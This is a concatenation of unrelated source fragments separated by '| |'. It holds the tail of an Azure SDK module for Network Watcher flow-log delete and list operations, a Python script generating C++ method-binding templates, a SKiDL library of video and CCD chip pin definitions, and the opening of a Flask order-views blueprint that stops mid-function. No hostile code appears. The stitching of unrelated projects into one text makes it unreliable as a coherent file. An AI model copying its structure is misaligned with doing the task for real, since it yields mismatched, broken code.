401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
flow_log_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified flow log resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param flow_log_name: The name of the flow log resource.
:type flow_log_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
flow_log_name=flow_log_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.FlowLogListResult"]
"""Lists all flow log resources for the specified Network Watcher.
:param resource_group_name: The name of the resource group containing Network Watcher.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FlowLogListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_08_01.models.FlowLogListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FlowLogListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('FlowLogListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs'} # type: ignore
| |
# -*- coding: ibm850 -*-
template_typed = """
#ifdef TYPED_METHOD_BIND
template<class T $ifret ,class R$ $ifargs ,$ $arg, class P@$>
class MethodBind$argc$$ifret R$$ifconst C$ : public MethodBind {
public:
$ifret R$ $ifnoret void$ (T::*method)($arg, P@$) $ifconst const$;
#ifdef DEBUG_METHODS_ENABLED
virtual Variant::Type _gen_argument_type(int p_arg) const { return _get_argument_type(p_arg); }
Variant::Type _get_argument_type(int p_argument) const {
$ifret if (p_argument==-1) return (Variant::Type)GetTypeInfo<R>::VARIANT_TYPE;$
$arg if (p_argument==(@-1)) return (Variant::Type)GetTypeInfo<P@>::VARIANT_TYPE;
$
return Variant::NIL;
}
virtual PropertyInfo _gen_argument_type_info(int p_argument) const {
$ifret if (p_argument==-1) return GetTypeInfo<R>::get_class_info();$
$arg if (p_argument==(@-1)) return GetTypeInfo<P@>::get_class_info();
$
return PropertyInfo();
}
#endif
virtual String get_instance_class() const {
return T::get_class_static();
}
virtual Variant call(Object* p_object,const Variant** p_args,int p_arg_count, Variant::CallError& r_error) {
T *instance=Object::cast_to<T>(p_object);
r_error.error=Variant::CallError::CALL_OK;
#ifdef DEBUG_METHODS_ENABLED
ERR_FAIL_COND_V(!instance,Variant());
if (p_arg_count>get_argument_count()) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_MANY_ARGUMENTS;
r_error.argument=get_argument_count();
return Variant();
}
if (p_arg_count<(get_argument_count()-get_default_argument_count())) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_FEW_ARGUMENTS;
r_error.argument=get_argument_count()-get_default_argument_count();
return Variant();
}
$arg CHECK_ARG(@);
$
#endif
$ifret Variant ret = $(instance->*method)($arg, _VC(@)$);
$ifret return Variant(ret);$
$ifnoret return Variant();$
}
#ifdef PTRCALL_ENABLED
virtual void ptrcall(Object*p_object,const void** p_args,void *r_ret) {
T *instance=Object::cast_to<T>(p_object);
$ifret PtrToArg<R>::encode( $ (instance->*method)($arg, PtrToArg<P@>::convert(p_args[@-1])$) $ifret ,r_ret)$ ;
}
#endif
MethodBind$argc$$ifret R$$ifconst C$ () {
#ifdef DEBUG_METHODS_ENABLED
_set_const($ifconst true$$ifnoconst false$);
_generate_argument_types($argc$);
#else
set_argument_count($argc$);
#endif
$ifret _set_returns(true); $
};
};
template<class T $ifret ,class R$ $ifargs ,$ $arg, class P@$>
MethodBind* create_method_bind($ifret R$ $ifnoret void$ (T::*p_method)($arg, P@$) $ifconst const$ ) {
MethodBind$argc$$ifret R$$ifconst C$<T $ifret ,R$ $ifargs ,$ $arg, P@$> * a = memnew( (MethodBind$argc$$ifret R$$ifconst C$<T $ifret ,R$ $ifargs ,$ $arg, P@$>) );
a->method=p_method;
return a;
}
#endif
"""
template = """
#ifndef TYPED_METHOD_BIND
$iftempl template<$ $ifret class R$ $ifretargs ,$ $arg, class P@$ $iftempl >$
class MethodBind$argc$$ifret R$$ifconst C$ : public MethodBind {
public:
StringName type_name;
$ifret R$ $ifnoret void$ (__UnexistingClass::*method)($arg, P@$) $ifconst const$;
#ifdef DEBUG_METHODS_ENABLED
virtual Variant::Type _gen_argument_type(int p_arg) const { return _get_argument_type(p_arg); }
Variant::Type _get_argument_type(int p_argument) const {
$ifret if (p_argument==-1) return (Variant::Type)GetTypeInfo<R>::VARIANT_TYPE;$
$arg if (p_argument==(@-1)) return (Variant::Type)GetTypeInfo<P@>::VARIANT_TYPE;
$
return Variant::NIL;
}
virtual PropertyInfo _gen_argument_type_info(int p_argument) const {
$ifret if (p_argument==-1) return GetTypeInfo<R>::get_class_info();$
$arg if (p_argument==(@-1)) return GetTypeInfo<P@>::get_class_info();
$
return PropertyInfo();
}
#endif
virtual String get_instance_class() const {
return type_name;
}
virtual Variant call(Object* p_object,const Variant** p_args,int p_arg_count, Variant::CallError& r_error) {
__UnexistingClass *instance = (__UnexistingClass*)p_object;
r_error.error=Variant::CallError::CALL_OK;
#ifdef DEBUG_METHODS_ENABLED
ERR_FAIL_COND_V(!instance,Variant());
if (p_arg_count>get_argument_count()) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_MANY_ARGUMENTS;
r_error.argument=get_argument_count();
return Variant();
}
if (p_arg_count<(get_argument_count()-get_default_argument_count())) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_FEW_ARGUMENTS;
r_error.argument=get_argument_count()-get_default_argument_count();
return Variant();
}
$arg CHECK_ARG(@);
$
#endif
$ifret Variant ret = $(instance->*method)($arg, _VC(@)$);
$ifret return Variant(ret);$
$ifnoret return Variant();$
}
#ifdef PTRCALL_ENABLED
virtual void ptrcall(Object*p_object,const void** p_args,void *r_ret) {
__UnexistingClass *instance = (__UnexistingClass*)p_object;
$ifret PtrToArg<R>::encode( $ (instance->*method)($arg, PtrToArg<P@>::convert(p_args[@-1])$) $ifret ,r_ret) $ ;
}
#endif
MethodBind$argc$$ifret R$$ifconst C$ () {
#ifdef DEBUG_METHODS_ENABLED
_set_const($ifconst true$$ifnoconst false$);
_generate_argument_types($argc$);
#else
set_argument_count($argc$);
#endif
$ifret _set_returns(true); $
};
};
template<class T $ifret ,class R$ $ifargs ,$ $arg, class P@$>
MethodBind* create_method_bind($ifret R$ $ifnoret void$ (T::*p_method)($arg, P@$) $ifconst const$ ) {
MethodBind$argc$$ifret R$$ifconst C$ $iftempl <$ $ifret R$ $ifretargs ,$ $arg, P@$ $iftempl >$ * a = memnew( (MethodBind$argc$$ifret R$$ifconst C$ $iftempl <$ $ifret R$ $ifretargs ,$ $arg, P@$ $iftempl >$) );
union {
$ifret R$ $ifnoret void$ (T::*sm)($arg, P@$) $ifconst const$;
$ifret R$ $ifnoret void$ (__UnexistingClass::*dm)($arg, P@$) $ifconst const$;
} u;
u.sm=p_method;
a->method=u.dm;
a->type_name=T::get_class_static();
return a;
}
#endif
"""
def make_version(template, nargs, argmax, const, ret):
intext = template
from_pos = 0
outtext = ""
while(True):
to_pos = intext.find("$", from_pos)
if (to_pos == -1):
outtext += intext[from_pos:]
break
else:
outtext += intext[from_pos:to_pos]
end = intext.find("$", to_pos + 1)
if (end == -1):
break # ignore
macro = intext[to_pos + 1:end]
cmd = ""
data = ""
if (macro.find(" ") != -1):
cmd = macro[0:macro.find(" ")]
data = macro[macro.find(" ") + 1:]
else:
cmd = macro
if (cmd == "argc"):
outtext += str(nargs)
if (cmd == "ifret" and ret):
outtext += data
if (cmd == "ifargs" and nargs):
outtext += data
if (cmd == "ifretargs" and nargs and ret):
outtext += data
if (cmd == "ifconst" and const):
outtext += data
elif (cmd == "ifnoconst" and not const):
outtext += data
elif (cmd == "ifnoret" and not ret):
outtext += data
elif (cmd == "iftempl" and (nargs > 0 or ret)):
outtext += data
elif (cmd == "arg,"):
for i in range(1, nargs + 1):
if (i > 1):
outtext += ", "
outtext += data.replace("@", str(i))
elif (cmd == "arg"):
for i in range(1, nargs + 1):
outtext += data.replace("@", str(i))
elif (cmd == "noarg"):
for i in range(nargs + 1, argmax + 1):
outtext += data.replace("@", str(i))
elif (cmd == "noarg"):
for i in range(nargs + 1, argmax + 1):
outtext += data.replace("@", str(i))
from_pos = end + 1
return outtext
def run(target, source, env):
versions = 13
versions_ext = 6
text = ""
text_ext = ""
for i in range(0, versions + 1):
t = ""
t += make_version(template, i, versions, False, False)
t += make_version(template_typed, i, versions, False, False)
t += make_version(template, i, versions, False, True)
t += make_version(template_typed, i, versions, False, True)
t += make_version(template, i, versions, True, False)
t += make_version(template_typed, i, versions, True, False)
t += make_version(template, i, versions, True, True)
t += make_version(template_typed, i, versions, True, True)
if (i >= versions_ext):
text_ext += t
else:
text += t
with open(target[0], "w") as f:
f.write(text)
with open(target[1], "w") as f:
f.write(text_ext)
if __name__ == '__main__':
from platform_methods import subprocess_main
subprocess_main(globals())
| |
from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
video = SchLib(tool=SKIDL).add_parts(*[
Part(name='AD725',dest=TEMPLATE,tool=SKIDL,keywords='Video',description='Low Cost RGB to NTSC/PAL Encoder with Luma Trap Port',ref_prefix='U',num_units=1,fplist=['SOIC*7.5x10.3mm*Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='NTSC/PAL',do_erc=True),
Pin(num='2',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='4FSC_CLK',do_erc=True),
Pin(num='4',name='AVCC',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='CE',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='RED',do_erc=True),
Pin(num='7',name='GREEN',do_erc=True),
Pin(num='8',name='BLUE',do_erc=True),
Pin(num='9',name='CHROM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='CVBS_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='11',name='LUM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='12',name='TRAP',do_erc=True),
Pin(num='13',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='DVCC',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='VSYNC',do_erc=True),
Pin(num='16',name='HSYNC',do_erc=True)]),
Part(name='AD9891',dest=TEMPLATE,tool=SKIDL,keywords='CCD Signal Processor',description='CCD Signal Processor, 20MHz 10bits, CSPBGA-64',ref_prefix='U',num_units=1,fplist=['BGA*10x10*9.0x9.0mm*Pitch0.8mm*'],do_erc=True,pins=[
Pin(num='A1',name='VD',func=Pin.BIDIR,do_erc=True),
Pin(num='B1',name='HD',func=Pin.BIDIR,do_erc=True),
Pin(num='C1',name='SYNC',do_erc=True),
Pin(num='D1',name='DCLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='F1',name='D1',func=Pin.OUTPUT,do_erc=True),
Pin(num='G1',name='D3',func=Pin.OUTPUT,do_erc=True),
Pin(num='H1',name='D5',func=Pin.OUTPUT,do_erc=True),
Pin(num='J1',name='D7',func=Pin.OUTPUT,do_erc=True),
Pin(num='K1',name='D9',do_erc=True),
Pin(num='A2',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='B2',name='DVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='C2',name='LD/FD',func=Pin.OUTPUT,do_erc=True),
Pin(num='D2',name='PBLK/CLPOB',func=Pin.OUTPUT,do_erc=True),
Pin(num='F2',name='D0/SD0',func=Pin.OUTPUT,do_erc=True),
Pin(num='G2',name='D2',func=Pin.OUTPUT,do_erc=True),
Pin(num='H2',name='D4',func=Pin.OUTPUT,do_erc=True),
Pin(num='J2',name='D6',func=Pin.OUTPUT,do_erc=True),
Pin(num='K2',name='D8',func=Pin.OUTPUT,do_erc=True),
Pin(num='A3',name='MSHUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='B3',name='STROBE',func=Pin.OUTPUT,do_erc=True),
Pin(num='J3',name='VSUB',func=Pin.OUTPUT,do_erc=True),
Pin(num='K3',name='DRVDD',func=Pin.PWROUT,do_erc=True),
Pin(num='A4',name='SDI',do_erc=True),
Pin(num='B4',name='SCK',do_erc=True),
Pin(num='J4',name='SUBCK',func=Pin.OUTPUT,do_erc=True),
Pin(num='K4',name='DRVSS',func=Pin.PWROUT,do_erc=True),
Pin(num='A5',name='REFT',func=Pin.OUTPUT,do_erc=True),
Pin(num='B5',name='SL',do_erc=True),
Pin(num='J5',name='V2',func=Pin.OUTPUT,do_erc=True),
Pin(num='K5',name='V1',func=Pin.OUTPUT,do_erc=True),
Pin(num='A6',name='REFB',func=Pin.OUTPUT,do_erc=True),
Pin(num='B6',name='AVSS2',func=Pin.PWRIN,do_erc=True),
Pin(num='J6',name='V4',func=Pin.OUTPUT,do_erc=True),
Pin(num='K6',name='V3',func=Pin.OUTPUT,do_erc=True),
Pin(num='A7',name='BYP3',func=Pin.OUTPUT,do_erc=True),
Pin(num='B7',name='AVDD2',func=Pin.PWRIN,do_erc=True),
Pin(num='J7',name='VSG2/V6',func=Pin.OUTPUT,do_erc=True),
Pin(num='K7',name='VSG1/V5',func=Pin.OUTPUT,do_erc=True),
Pin(num='A8',name='CDD-IN',do_erc=True),
Pin(num='B8',name='BYP2',func=Pin.OUTPUT,do_erc=True),
Pin(num='J8',name='VSG4/V8',func=Pin.OUTPUT,do_erc=True),
Pin(num='K8',name='VSG3/V7',func=Pin.OUTPUT,do_erc=True),
Pin(num='A9',name='BYP1',func=Pin.OUTPUT,do_erc=True),
Pin(num='B9',name='AVSS1',func=Pin.PWRIN,do_erc=True),
Pin(num='C9',name='TCVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='D9',name='RG',func=Pin.OUTPUT,do_erc=True),
Pin(num='E9',name='RGVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='F9',name='H4',func=Pin.OUTPUT,do_erc=True),
Pin(num='G9',name='HVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='H9',name='H2',func=Pin.OUTPUT,do_erc=True),
Pin(num='J9',name='VSG6',func=Pin.OUTPUT,do_erc=True),
Pin(num='K9',name='VSG5',func=Pin.OUTPUT,do_erc=True),
Pin(num='A10',name='AVDD1',func=Pin.PWRIN,do_erc=True),
Pin(num='B10',name='TCVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='C10',name='CLI',do_erc=True),
Pin(num='D10',name='CLO',func=Pin.OUTPUT,do_erc=True),
Pin(num='E10',name='RGVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='F10',name='H3',func=Pin.OUTPUT,do_erc=True),
Pin(num='G10',name='HVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='H10',name='H1',func=Pin.OUTPUT,do_erc=True),
Pin(num='J10',name='VSG8',func=Pin.OUTPUT,do_erc=True),
Pin(num='K10',name='VSG7',func=Pin.OUTPUT,do_erc=True)]),
Part(name='AD9895',dest=TEMPLATE,tool=SKIDL,keywords='CCD Signal Processor',description='CCD Signal Processor, 30MHz 12bits, CSPBGA-64',ref_prefix='U',num_units=1,fplist=['BGA*10x10*9.0x9.0mm*Pitch0.8mm*'],do_erc=True,pins=[
Pin(num='A1',name='VD',func=Pin.BIDIR,do_erc=True),
Pin(num='B1',name='HD',func=Pin.BIDIR,do_erc=True),
Pin(num='C1',name='SYNC',do_erc=True),
Pin(num='D1',name='DCLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='E1',name='D1',func=Pin.OUTPUT,do_erc=True),
Pin(num='F1',name='D3',func=Pin.OUTPUT,do_erc=True),
Pin(num='G1',name='D5',func=Pin.OUTPUT,do_erc=True),
Pin(num='H1',name='D7',func=Pin.OUTPUT,do_erc=True),
Pin(num='J1',name='D9',func=Pin.OUTPUT,do_erc=True),
Pin(num='K1',name='D11',do_erc=True),
Pin(num='A2',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='B2',name='DVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='C2',name='LD/FD',func=Pin.OUTPUT,do_erc=True),
Pin(num='D2',name='PBLK/CLPOB',func=Pin.OUTPUT,do_erc=True),
Pin(num='E2',name='D0',func=Pin.OUTPUT,do_erc=True),
Pin(num='F2',name='D2/SD0',func=Pin.OUTPUT,do_erc=True),
Pin(num='G2',name='D4',func=Pin.OUTPUT,do_erc=True),
Pin(num='H2',name='D6',func=Pin.OUTPUT,do_erc=True),
Pin(num='J2',name='D8',func=Pin.OUTPUT,do_erc=True),
Pin(num='K2',name='D10',func=Pin.OUTPUT,do_erc=True),
Pin(num='A3',name='MSHUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='B3',name='STROBE',func=Pin.OUTPUT,do_erc=True),
Pin(num='J3',name='VSUB',func=Pin.OUTPUT,do_erc=True),
Pin(num='K3',name='DRVDD',func=Pin.PWROUT,do_erc=True),
Pin(num='A4',name='SDI',do_erc=True),
Pin(num='B4',name='SCK',do_erc=True),
Pin(num='J4',name='SUBCK',func=Pin.OUTPUT,do_erc=True),
Pin(num='K4',name='DRVSS',func=Pin.PWROUT,do_erc=True),
Pin(num='A5',name='REFT',func=Pin.OUTPUT,do_erc=True),
Pin(num='B5',name='SL',do_erc=True),
Pin(num='J5',name='V2',func=Pin.OUTPUT,do_erc=True),
Pin(num='K5',name='V1',func=Pin.OUTPUT,do_erc=True),
Pin(num='A6',name='REFB',func=Pin.OUTPUT,do_erc=True),
Pin(num='B6',name='AVSS2',func=Pin.PWRIN,do_erc=True),
Pin(num='J6',name='V4',func=Pin.OUTPUT,do_erc=True),
Pin(num='K6',name='V3',func=Pin.OUTPUT,do_erc=True),
Pin(num='A7',name='BYP3',func=Pin.OUTPUT,do_erc=True),
Pin(num='B7',name='AVDD2',func=Pin.PWRIN,do_erc=True),
Pin(num='J7',name='VSG2/V6',func=Pin.OUTPUT,do_erc=True),
Pin(num='K7',name='VSG1/V5',func=Pin.OUTPUT,do_erc=True),
Pin(num='A8',name='CDD-IN',do_erc=True),
Pin(num='B8',name='BYP2',func=Pin.OUTPUT,do_erc=True),
Pin(num='J8',name='VSG4/V8',func=Pin.OUTPUT,do_erc=True),
Pin(num='K8',name='VSG3/V7',func=Pin.OUTPUT,do_erc=True),
Pin(num='A9',name='BYP1',func=Pin.OUTPUT,do_erc=True),
Pin(num='B9',name='AVSS1',func=Pin.PWRIN,do_erc=True),
Pin(num='C9',name='TCVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='D9',name='RG',func=Pin.OUTPUT,do_erc=True),
Pin(num='E9',name='RGVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='F9',name='H4',func=Pin.OUTPUT,do_erc=True),
Pin(num='G9',name='HVSS',func=Pin.PWRIN,do_erc=True),
Pin(num='H9',name='H2',func=Pin.OUTPUT,do_erc=True),
Pin(num='J9',name='VSG6',func=Pin.OUTPUT,do_erc=True),
Pin(num='K9',name='VSG5',func=Pin.OUTPUT,do_erc=True),
Pin(num='A10',name='AVDD1',func=Pin.PWRIN,do_erc=True),
Pin(num='B10',name='TCVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='C10',name='CLI',do_erc=True),
Pin(num='D10',name='CLO',func=Pin.OUTPUT,do_erc=True),
Pin(num='E10',name='RGVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='F10',name='H3',func=Pin.OUTPUT,do_erc=True),
Pin(num='G10',name='HVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='H10',name='H1',func=Pin.OUTPUT,do_erc=True),
Pin(num='J10',name='VSG8',func=Pin.OUTPUT,do_erc=True),
Pin(num='K10',name='VSG7',func=Pin.OUTPUT,do_erc=True)]),
Part(name='AV9173',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='CX7930',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='CXD3400N',dest=TEMPLATE,tool=SKIDL,keywords='CCD Clock Driver',description='6-channel Vertical Clock Driver for CCD Image Sensor, SSOP-20',ref_prefix='U',num_units=1,fplist=['SSOP*'],do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='XSHT',do_erc=True),
Pin(num='3',name='XV3',do_erc=True),
Pin(num='4',name='XSG3B',do_erc=True),
Pin(num='5',name='XSG3A',do_erc=True),
Pin(num='6',name='XV1',do_erc=True),
Pin(num='7',name='XSG1B',do_erc=True),
Pin(num='8',name='XSG1A',do_erc=True),
Pin(num='9',name='XV4',do_erc=True),
Pin(num='10',name='XV2',do_erc=True),
Pin(num='20',name='SHT',func=Pin.OUTPUT,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='V2',func=Pin.OUTPUT,do_erc=True),
Pin(num='13',name='V4',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='V1A',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='VH',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='V1B',func=Pin.OUTPUT,do_erc=True),
Pin(num='17',name='V3A',func=Pin.OUTPUT,do_erc=True),
Pin(num='18',name='VL',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='V3B',func=Pin.OUTPUT,do_erc=True)]),
Part(name='HD63484',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='HD63484_PLCC',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='ICX415AQ',dest=TEMPLATE,tool=SKIDL,keywords='CCD B/W Image Sensor',description='Diagonal 8mm B/W Progressive Scan CCD Image Sensor with Square Pixel, CERDIP-22',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='3',name='V3',do_erc=True),
Pin(num='4',name='V2',do_erc=True),
Pin(num='5',name='V1',do_erc=True),
Pin(num='7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='VOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='CGG',do_erc=True),
Pin(num='20',name='CSUB',do_erc=True),
Pin(num='21',name='SUBCIR',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='RG',do_erc=True),
Pin(num='14',name='VL',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='SUB',do_erc=True),
Pin(num='16',name='H1',do_erc=True),
Pin(num='17',name='H2',do_erc=True)]),
Part(name='LM1881',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX310',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX311',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MB88303P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='S178',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='SI582',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='TDA1950',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['TDA1950F']),
Part(name='TDA2593',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='TDA7260',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='TDA9500',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['TDA9503', 'TDA9513']),
Part(name='TEA5115',dest=TEMPLATE,tool=SKIDL,do_erc=True)])
| |
"Script to generate the order related views of Haldis"
import random
import typing
from datetime import datetime
from werkzeug.wrappers import Response
# from flask import current_app as app
from flask import (
Blueprint,
abort,
flash,
redirect,
render_template,
request,
session,
url_for,
wrappers,
)
from flask_login import current_user, login_required
from forms import AnonOrderItemForm, OrderForm, OrderItemForm
from models import Order, OrderItem, User, db
from hlds.definitions import location_definitions, location_definition_version
from notification import post_order_to_webhook
from utils import ignore_none
order_bp = Blueprint("order_bp", "order")
@order_bp.route("/")
def orders(form: OrderForm = None) -> str:
"Generate general order view"
if form is None and not current_user.is_anonymous():
form = OrderForm()
location_id = request.args.get("location_id")
form.location_id.default = location_id
form.process()
form.populate()
return render_template("orders.html", orders=get_orders(), form=form)
@order_bp.route("/create", methods=["POST"])
@login_required
def order_create() -> typing.Union[str, Response]:
"Generate order create view"
orderForm = OrderForm()
orderForm.populate()
if orderForm.validate_on_submit():
order = Order()
orderForm.populate_obj(order)
order.update_from_hlds()
db.session.add(order)
db.session.commit()
post_order_to_webhook(order)
return redirect(url_for("order_bp.order_from_id", order_id=order.id))
return orders(form=orderForm)
@order_bp.route("/<order_id>")
def order_from_id(order_id: int, form: OrderForm = None, dish_id=None) -> str:
"Generate order view from id"
order = Order.query.filter(Order.id == order_id).first()
if order is None:
abort(404)
if current_user.is_anonymous() and not order.public:
flash("Please login to see this order.", "info")
abort(401)
if form is None:
form = AnonOrderItemForm() if current_user.is_anonymous() else OrderItemForm()
